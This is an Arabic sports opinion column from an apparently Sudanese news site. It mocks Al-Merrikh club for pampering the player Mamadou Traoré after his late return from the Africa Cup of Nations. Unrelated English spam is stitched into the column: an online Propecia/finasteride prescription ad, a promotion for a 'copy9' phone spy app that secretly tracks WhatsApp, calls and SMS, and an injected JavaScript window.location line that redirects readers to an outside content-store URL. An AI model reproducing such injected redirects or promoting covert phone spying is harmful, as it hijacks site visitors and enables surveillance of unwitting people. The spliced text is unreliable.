سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

محمد كامل يكتب بعنوان البيت بيتك يا تراوري ونحن الضيوف

13
البيت بيتك يا “تراوري” ونحن الضيوف..!!image
* قبل كل شيء لابد لنا من إرسال التهانئ أطناناً وأطناناً لعشاق المريخ وكل منتسبيه بداية من قادة مجلس الإدارة، ومروراً بالجهاز الفني واللاعبين، وانتهاءً بالزملاء الإعلاميين بمناسبة عودة (صاحب السمو) “مامادو تراوري” بالسلامة إلى أرض الوطن..!!
* وللحقيقة فإن عودة (مبعوث العناية الإلهية) تعتبر من الإنجازات الكبيرة التي يستحق عليها مجلس الإدارة التهنئة.. ولكن ما أصابني بالحيرة سؤال يتمثل في: ما هي الأسباب التي منعت عشاق المريخ من استقبال النجم الخرافي بمطار الخرطوم..؟!!
* عاد “تراوري”، ومن جانبه وعلى وجه السرعة قام المكتب التنفيذي بإتمام إجراءات سفره إلى تنزانيا في (تطبيق عملي للطريقة المثالية التي يجب أن يكون عليها العمل الاحترافي) خاصة وأن اللاعب لم يتأخر سوى عشرة أيام فقط..!!

propecia proscar online consult & prescription finasteride hair loss central – hair loss central is a directory and search engine for hair loss products and services.

* أتوقع أن لا يعجب كلامي هذا الكثير من المتابعين لأنني ربما أكون حاقداً أو متسبباً في تأخير وصول اللاعب الذي أصابه الإرهاق من المشاركة مع منتخب بلاده في نهائيات الأمم الأفريقية الأخيرة التي ودعها منتخب مالي قبل (11) يوماً..!!
* ولا أدري ربما يحمل “تراوري” جنسية عاجية دون علم المجلس جعلته يتأخر ليجلس في كنبة الاحتياط ضمن قائمة منتخب ساحل العاج الذي فاز أول أمس بالكأس الأفريقية..!!
* أو ربما منحه المجلس فرصة البقاء ببلاده للاستمتاع بمباريات النهائيات عبر التلفاز لتخفيف صدمة عدم مشاركته كأساسي من منتخب بلاده الذي ودع ربما بمؤامرة هلالية من الدور الأول حتى لا تتأثر نفسياته بالخيبة..!!
* ثم ألم يقل اللاعب في تصريحات ـ ليست مشتولة ـ إن مستواه لا ولن يتأثر بالغياب عن التمارين ولو أبتعد عن الكرة لثلاثة اشهر..؟! ثم أعلن جاهزيته للمشاركة وأداء ضريبة المريخ ولو “على نقالة”..!! (على نقالة دي من عندي)..!!
* ومن هنا أعتقد أن علينا الترحيب بالنجم الخرافي المنضبط والذي لا يوجد مثيله في كل أنحاء العالم.. وليس بغريب أن نهمس في أذنه (مرحباً “تراوري”.. المريخ بيتك.. فافعل ما تشاء لأننا نحن الضيوف)..!!
* لنقف أمام الحديث الذي أدلى به الفرنسي “غارزيتو” والذي أكد فيه حاجته الملحة لتراوري استناداً على انه يملك حساسية اللعب الدولي ويشارك مع منتخب بلاده خاصة أمام عزام التنزاني (ولا أحد يسألني عن متى واين شارك الدولي)..!!
* الحقيقة أن الفوضى التي يتعامل بها المريخ مع لاعبيه عموماً و”تراوري” والمحترفين على وجه الخصوص هي سبب البلاوي والمآسي.. ورغم أن ما نقوله هو عين المنطق إلا أن الاتهامات ستلاحقنا وتحاصرنا مع الشتائم والسباب..!!
* الشاهد أن ما يحدث من (الملك تراوري) ولو حدث من أي لاعب محترف في أي فريق محترم يعرف معنى الاحتراف لما استمر لشهر واحد.. لكن ماذا نقول طالما أنه السودان والمريخ..؟!!
* تخريمة أولى: على الأسرة المريخية أن لا تتعجب إذا ما رفض “تراروي” السفر إلى دار السلام ما لم يتسلم راتب الثلاثة أشهر المقبلة مقدماً خاصة وأنه ظل يتعامل مع النادي على أنه (صرّاف آلي) وبس..!!
* تخريمة ثانية: حتى عقوبات الغرامة الشكلية التي كانت تحدث في نادي المريخ وقيام المجلس بدفعها نيابة عن اللاعب المذنب صارت من احلام الماضي..!!
* تخريمة ثالثة: عندي اقتراح.. لماذا لا يتم إطلاق اسم “تراوري” على الملعب الرديف أو صالة الاجتماعات الكبرى بالنادي..؟!!

 

gps spy tracker for android – free download and ?copy9 is one of the best phone spy app provider in usa and provide spy whatsapp,call recorder, sms tracker, gps tracker . visit our website today!!

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.